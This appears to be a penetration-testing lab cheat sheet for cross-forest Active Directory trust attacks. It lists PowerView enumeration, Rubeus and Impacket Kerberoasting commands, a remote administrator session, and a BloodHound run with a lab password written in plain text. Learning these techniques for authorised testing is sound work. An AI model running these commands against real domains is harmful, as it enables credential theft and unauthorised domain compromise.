Trust Relationships - Cross-Forest
Trust Relationships - Cross-Forest
1. Enumerate Accounts with Service Principal Names (SPNs)
Command:
Get-DomainUser -SPN -Domain FREIGHTLOGISTICS.LOCAL | select SamAccountName
Description: PowerView tool used to enumerate accounts with associated SPNs.
2. Enumerate MSSQL Service Account
Command:
Get-DomainUser -Domain FREIGHTLOGISTICS.LOCAL -Identity mssqlsvc | select samaccountname,memberof
Description: PowerView tool used to enumerate the
mssqlsvc
account.
3. Perform Kerberoasting Attack with Rubeus
Command:
.\Rubeus.exe kerberoast /domain:FREIGHTLOGISTICS.LOCAL /user:mssqlsvc /nowrap
Description: Uses Rubeus to perform a Kerberoasting attack against a target Windows domain.
4. Enumerate Foreign Group Members
Command:
Get-DomainForeignGroupMember -Domain FREIGHTLOGISTICS.LOCAL
Description: PowerView tool used to enumerate groups containing users from outside the domain.
5. Establish Remote PowerShell Session
Command:
Enter-PSSession -ComputerName ACADEMY-EADC03.FREIGHTLOGISTICS.LOCAL -Credential INLANEFREIGHT\administrator
Description: PowerShell cmdlet used to connect remotely to a target Windows system.
6. Request TGS Ticket for Kerberoasting
Command:
GetUserSPNs.py -request -targetdomain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley
Description: Impacket tool used to request a TGS ticket for an account in the target Windows domain.
7. Run BloodHound Enumeration
Command:
bloodhound-python -d INLANEFREIGHT.LOCAL -dc ACADEMY-EADC01 -c All -u forend -p Klmcargo2
Description: Runs the Python implementation of BloodHound to map Active Directory relationships.
8. Compress Files for BloodHound GUI Upload
Command:
zip -r ilfreight_bh.zip *.json
Description: Compresses multiple JSON files into a single
.zip
file for upload into the BloodHound GUI.
Last updated